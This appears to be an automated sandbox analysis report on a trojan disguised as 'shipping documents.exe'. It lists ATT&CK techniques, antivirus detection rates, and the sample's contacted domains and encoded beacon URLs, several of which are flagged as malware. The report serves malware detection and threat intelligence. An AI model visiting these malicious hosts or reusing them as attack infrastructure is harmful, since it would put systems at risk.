Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
shipping documents.exe	39%	ReversingLabs	Win32.Trojan.Strab
shipping documents.exe	28%	Virustotal		Browse
shipping documents.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.sandranoll.com	11%	Virustotal	Browse
www.dmtxwuatbz.cc	2%	Virustotal	Browse
www.xn--matfrmn-jxa4m.se	0%	Virustotal	Browse
www.catherineviskadi.com	1%	Virustotal	Browse
www.anuts.top	7%	Virustotal	Browse
www.bfiworkerscomp.com	0%	Virustotal	Browse
www.xn--fhq1c541j0zr.com	0%	Virustotal	Browse
www.helpers-lion.online	0%	Virustotal	Browse
www.telwisey.info	2%	Virustotal	Browse
www.gipsytroya.com	1%	Virustotal	Browse
www.hatercoin.online	2%	Virustotal	Browse
parkingpage.namecheap.com	0%	Virustotal	Browse
www.hprlz.cz	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reg.ru	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://dts.gnpge.com	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Avira URL Cloud	safe
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	0%	Virustotal		Browse
https://dts.gnpge.com	0%	Virustotal		Browse
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/	0%	Avira URL Cloud	safe
http://www.xn--fhq1c541j0zr.com/rm91/	0%	Avira URL Cloud	safe
https://reg.ru	0%	Virustotal		Browse
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	0%	Virustotal		Browse
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Virustotal		Browse
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	0%	Avira URL Cloud	safe
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Virustotal		Browse
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	1%	Virustotal		Browse
https://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	0%	Virustotal		Browse
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
http://www.xn--fhq1c541j0zr.com/rm91/	0%	Virustotal		Browse
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	0%	Virustotal		Browse
https://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Virustotal		Browse
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	1%	Virustotal		Browse
http://www.dmtxwuatbz.cc/lfkn/	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	1%	Virustotal		Browse
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png	0%	Virustotal		Browse
http://www.sandranoll.com/aroo/	100%	Avira URL Cloud	malware
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Virustotal		Browse
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png	0%	Virustotal		Browse
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png	0%	Avira URL Cloud	safe
http://www.gipsytroya.com/tf44/	0%	Avira URL Cloud	safe
http://www.xn--matfrmn-jxa4m.se/4hda/	100%	Avira URL Cloud	malware
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Virustotal		Browse
http://www.gipsytroya.com/tf44/?jN=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&uXTT=8FDHY8dP	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Virustotal		Browse
https://www.networksolutions.com/	0%	Avira URL Cloud	safe
http://www.telwisey.info/ei85/	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Virustotal		Browse
http://www.xn--matfrmn-jxa4m.se/4hda/	0%	Virustotal		Browse
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
http://www.telwisey.info/ei85/?jN=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&uXTT=8FDHY8dP	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan	0%	Avira URL Cloud	safe
http://www.helpers-lion.online/mooq/?uXTT=8FDHY8dP&jN=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ==	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/backup.png	0%	Avira URL Cloud	safe
https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
http://www.xn--fhq1c541j0zr.com/rm91/?uXTT=8FDHY8dP&jN=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw==	0%	Avira URL Cloud	safe
https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	0%	Avira URL Cloud	safe
http://www.anuts.top/li0t/?uXTT=8FDHY8dP&jN=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw==	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.catherineviskadi.com/qe66/	0%	Avira URL Cloud	safe
https://www.reg.ru/dedicated/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	0%	Avira URL Cloud	safe
http://www.xn--matfrmn-jxa4m.se/4hda/?jN=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&uXTT=8FDHY8dP	100%	Avira URL Cloud	malware
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
http://www.anuts.top/li0t/	0%	Avira URL Cloud	safe
http://www.dmtxwuatbz.cc	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/?uXTT=8FDHY8dP&jN=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA==	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe
http://www.helpers-lion.online/mooq/	0%	Avira URL Cloud	safe
http://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==	0%	Avira URL Cloud	safe
http://www.sandranoll.com/aroo/?uXTT=8FDHY8dP&jN=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ==	100%	Avira URL Cloud	malware
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe
http://www.catherineviskadi.com/qe66/?jN=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&uXTT=8FDHY8dP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.sandranoll.com	213.145.228.16	true	false	11%, Virustotal, Browse	unknown
www.dmtxwuatbz.cc	172.67.210.102	true	false	2%, Virustotal, Browse	unknown
www.xn--matfrmn-jxa4m.se	194.9.94.85	true	false	0%, Virustotal, Browse	unknown
www.catherineviskadi.com	217.160.0.106	true	false	1%, Virustotal, Browse	unknown
www.anuts.top	23.251.54.212	true	false	7%, Virustotal, Browse	unknown
www.helpers-lion.online	194.58.112.174	true	false	0%, Virustotal, Browse	unknown
www.bfiworkerscomp.com	208.91.197.27	true	false	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	false	0%, Virustotal, Browse	unknown
www.telwisey.info	199.192.19.19	true	false	2%, Virustotal, Browse	unknown
www.hprlz.cz	5.44.111.162	true	false	1%, Virustotal, Browse	unknown
www.xn--fhq1c541j0zr.com	43.252.167.188	true	false	0%, Virustotal, Browse	unknown
www.fourgrouw.cfd	unknown	unknown	true		unknown
www.hatercoin.online	unknown	unknown	true	2%, Virustotal, Browse	unknown
www.tinmapco.com	unknown	unknown	true		unknown
www.gipsytroya.com	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.xn--fhq1c541j0zr.com/rm91/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/xzzi/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.dmtxwuatbz.cc/lfkn/	false	Avira URL Cloud: safe	unknown
http://www.sandranoll.com/aroo/	true	Avira URL Cloud: malware	unknown
http://www.gipsytroya.com/tf44/	false	Avira URL Cloud: safe	unknown
http://www.xn--matfrmn-jxa4m.se/4hda/	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.gipsytroya.com/tf44/?jN=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&uXTT=8FDHY8dP	false	Avira URL Cloud: safe	unknown
http://www.telwisey.info/ei85/	false	Avira URL Cloud: safe	unknown
http://www.telwisey.info/ei85/?jN=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&uXTT=8FDHY8dP	false	Avira URL Cloud: safe	unknown
http://www.helpers-lion.online/mooq/?uXTT=8FDHY8dP&jN=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGhsE2fBM2zTxwuji6F0Pbl1x/Uo4pPUilA6mApMPDsyvzdQ==	false	Avira URL Cloud: safe	unknown
http://www.xn--fhq1c541j0zr.com/rm91/?uXTT=8FDHY8dP&jN=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WA/0x0l7m7B814c3LweorfxiP0L71SZjJ1PPNKkJ0Qx2crw==	false	Avira URL Cloud: safe	unknown
http://www.anuts.top/li0t/?uXTT=8FDHY8dP&jN=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfhgzxX5A8Pgwb+i5XvTgZRBJb2EypYfKSb86Vxi/qsGcisw==	false	Avira URL Cloud: safe	unknown
http://www.catherineviskadi.com/qe66/	false	Avira URL Cloud: safe	unknown
http://www.xn--matfrmn-jxa4m.se/4hda/?jN=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&uXTT=8FDHY8dP	false	Avira URL Cloud: malware	unknown
http://www.anuts.top/li0t/	false	Avira URL Cloud: safe	unknown
http://www.bfiworkerscomp.com/xzzi/?uXTT=8FDHY8dP&jN=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA==	false	Avira URL Cloud: safe	unknown
http://www.helpers-lion.online/mooq/	false	Avira URL Cloud: safe	unknown
http://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==	false	Avira URL Cloud: safe	unknown
http://www.sandranoll.com/aroo/?uXTT=8FDHY8dP&jN=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ==	true	Avira URL Cloud: malware	unknown
http://www.catherineviskadi.com/qe66/?jN=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&uXTT=8FDHY8dP	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dts.gnpge.com	RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.000000000300C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://reg.ru	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.000000000595C000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.000000000300C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	clip.exe, 00000004.00000002.4519037536.0000000006136000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000037E6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.loopia.se/responsive/images/iOS-72.png	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	clip.exe, 00000004.00000002.4519037536.00000000065EC000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003C9C000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH	clip.exe, 00000004.00000002.4519037536.0000000005314000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000029C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2573613752.0000000013934000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.hprlz.cz/w6qg/?uXTT=8FDHY8dP&jN=0lpTRQcDUH	clip.exe, 00000004.00000002.4519037536.0000000005314000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000029C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2573613752.0000000013934000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	clip.exe, 00000004.00000002.4520701418.0000000007AFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png	clip.exe, 00000004.00000002.4519037536.00000000062C8000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.0000000003978000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	clip.exe, 00000004.00000002.4520615398.0000000007850000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4519037536.0000000005E12000.00000004.10000000.00040000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4518122179.00000000034C2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
